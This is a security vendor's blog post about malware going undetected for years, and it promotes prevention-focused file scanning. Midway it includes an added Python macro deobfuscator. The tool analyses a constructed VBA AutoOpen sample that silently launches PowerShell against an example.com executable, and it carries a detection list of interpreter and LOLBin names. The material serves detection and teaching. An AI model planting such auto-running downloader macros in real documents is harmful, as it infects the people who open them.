Boris Vaynberg

by Boris Vaynberg

VP and GM for Advanced Threat Detection

Posted Dec 26, 2018

Malware can stick around for years.


Wine, whiskey and cheese are all things we know and love, but they are notorious for how long they take to reach their best (read: taste and price). Malware that sits active inside your infrastructure for years is a completely different story.

How many more headlines must we read about breaches that were in place and causing damage for years before they were identified and remediated, before we finally accept that doing the same thing and expecting a different result is the definition of futility?

Is there a time limit on how long you will wait before you are ready for a different cybersecurity strategy, or are you waiting until your organization becomes the next headline?

Four Years In The Making

Rachel Kraus reported in her Mashable article titled “Marriott data breach affected 500 million customers over four years:”

“Marriott International, Inc. disclosed a data breach of its Starwood guest reservation database on Friday. It estimates that the hack has affected 500 million customers, and acknowledged that the compromise had gone undetected for four years; hackers have had access to components of the database since 2014, and Marriott only became aware of any security issue in September 2018.”

Unfortunately, Marriott is not alone. The Ponemon Institute's 2018 Cost of a Data Breach study reports: “In this year’s study, the average cost of a data breach per compromised record was $148, and it took organizations 196 days, on average, to detect a breach.”

Knowing that even one day of attacker access can devastate an organization, how can we tolerate a 196-day average? The time is now to evaluate a new set of cybersecurity principles.

Prevention Eliminates The Waiting Game

The best way to avoid the waiting game, and to avoid becoming the next headline that embarrasses your company and hits your shareholder value, is to apply these three principles:

  1. Prevent, don’t remediate: Strengthen your cyber defenses dramatically by preventing attacks before they enter and harm your organization, your customers and your brand. Remediation is costly; prevention is not.
  2. Detect the undetected: Identify any malicious or hidden code within incoming data files, whether on your network or in the cloud. What you don’t know or cannot see can harm you.
  3. Avoid the fire drill: Proactively and radically improve the agility of your cybersecurity. Finally, you can detect and protect against unknown (“zero-day”) risks, so at last you can take the panic out of cybersecurity.

The primary key is to protect against malware in active content, and against file-less malware as well. Active content such as macros should be de-obfuscated, no matter the level of nesting or encryption, and evaluated to determine its true purpose. Malicious scripts, links and URLs that may be hidden, self-extracting or hosted on remote servers should be analyzed immediately and determined to be clean or not.
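As an added illustration of the de-obfuscation step described above (this is example code written for this article, not Cybereason's or the author's product), the following Python resolves a constructed, hypothetical VBA macro statically: it folds Chr() calls, StrReverse() and string concatenation to a fixed point, tracks variables that are built up over several assignments, and reports the URL and the interpreter that the obfuscation was hiding. The sample macro, the variable names and the verdict thresholds are all assumptions made for the example.

```python
import re

# Constructed sample, hypothetical and written for this example: a Word
# AutoOpen macro that assembles "powershell" from Chr() calls, appends a
# reversed URL, and hands the result to Shell.  Not an in-the-wild sample.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim s As String
    ' build the interpreter name one character at a time
    s = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)
    s = s & " -w hidden -c " & StrReverse("exe.etadpu/moc.elpmaxe//:ptth")
    Shell s, vbHide
End Sub
'''

STRING = r'"([^"]*)"'                      # VBA literal ("" escapes not handled)
RE_LITERAL_ONLY = re.compile(r'^\s*' + STRING + r'\s*$')
RE_CHR = re.compile(r'\bChr[W$]?\(\s*(\d{1,3})\s*\)', re.IGNORECASE)
RE_REVERSE = re.compile(r'\bStrReverse\(\s*' + STRING + r'\s*\)', re.IGNORECASE)
RE_CONCAT = re.compile(STRING + r'\s*[&+]\s*' + STRING)
RE_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+)$')
RE_SHELL = re.compile(r'^\s*(?:Call\s+)?Shell\b\s*\(?(.*?)\)?\s*$', re.IGNORECASE)
RE_URL = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)
# Interpreters and LOLBins a document macro has no business launching.
SUSPICIOUS = ("powershell", "cmd.exe", "wscript", "cscript", "mshta",
              "regsvr32", "rundll32", "certutil", "bitsadmin")

def strip_comment(line):
    """Drop a trailing ' comment, ignoring apostrophes inside literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line

def _chr_to_literal(m):
    code = int(m.group(1))
    # Fold printable ASCII only; Chr(34) is the quote character and would
    # break the literal syntax the other rules depend on, so it is left alone.
    return '"%s"' % chr(code) if 32 <= code < 127 and code != 34 else m.group(0)

def fold_expression(expr, max_rounds=100):
    """Rewrite an expression toward a single literal by applying local rules
    to a fixed point.  Nested calls collapse because each rule only fires once
    its arguments are already literals; the round cap bounds the work an
    adversarial input can cause."""
    for _ in range(max_rounds):
        new = RE_CHR.sub(_chr_to_literal, expr)
        new = RE_REVERSE.sub(lambda m: '"%s"' % m.group(1)[::-1], new)
        new = RE_CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), new)
        if new == expr:
            break
        expr = new
    return expr

def substitute(expr, env):
    """Inline known string variables, but only in code between literals."""
    parts = re.split(r'("[^"]*")', expr)
    for i in range(0, len(parts), 2):          # even slots lie outside literals
        for name, value in env.items():
            parts[i] = re.sub(r'\b%s\b' % re.escape(name),
                              lambda _m, v=value: '"%s"' % v,
                              parts[i], flags=re.IGNORECASE)
    return ''.join(parts)

def analyze_macro(src):
    """Static pass: resolve string variables line by line, record what is
    handed to Shell, then pull URLs and interpreter names out of the result."""
    env, shell_commands = {}, []
    for raw in src.splitlines():
        line = strip_comment(raw).strip()
        if not line:
            continue
        m = RE_SHELL.match(line)
        if m:
            folded = fold_expression(substitute(m.group(1), env))
            lit = re.search(STRING, folded)
            shell_commands.append(lit.group(1) if lit else folded)
            continue
        m = RE_ASSIGN.match(line)
        if m:
            name, rhs = m.group(1).lower(), m.group(2)
            lit = RE_LITERAL_ONLY.match(fold_expression(substitute(rhs, env)))
            if lit:
                env[name] = lit.group(1)
            else:
                env.pop(name, None)             # value no longer statically known
    strings = list(env.values()) + shell_commands
    urls = sorted({u for s in strings for u in RE_URL.findall(s)})
    tokens = sorted({t for s in strings for t in SUSPICIOUS if t in s.lower()})
    if shell_commands and (urls or tokens):
        verdict = "malicious"
    elif urls or tokens:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"variables": env, "shell_commands": shell_commands,
            "urls": urls, "suspicious_tokens": tokens, "verdict": verdict}

if __name__ == "__main__":
    print(analyze_macro(SAMPLE_MACRO))
```

The point of the fixed-point loop is that nesting depth does not matter: each pass only collapses forms whose arguments are already literals, so inner calls resolve first and the same three rules handle a Chr() inside a StrReverse() inside a concatenation. A static pass like this cannot resolve values that only exist at run time (strings fetched from document properties, or decrypted with a key the macro derives from its environment), which is why production analyzers pair it with emulation; that limit is worth remembering before trusting any "clean" verdict.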

Your Solution Shouldn’t Break The Bank Either

Network-based software solutions don't require the additional capital investment that other solutions do. They also usually need no additional staff to manage and constantly monitor them, which is what drives up operational TCO. Evaluate parser-based solutions that are agnostic to client-side applications, operating systems and the environment in which they operate.

Such solutions are designed to resist evasion and can handle extremely high volumes of content directly on major ingress vectors such as email. They usually offer simple but extensible RESTful API integrations with proxies (for web downloads), B2B connections and cloud file-sharing applications, so every channel gets the same treatment: homogeneous, granular results down to the exploit and attack payload, however encrypted or obfuscated it may be.

Ultimately your costs will be reduced, and your CFO will be happier.
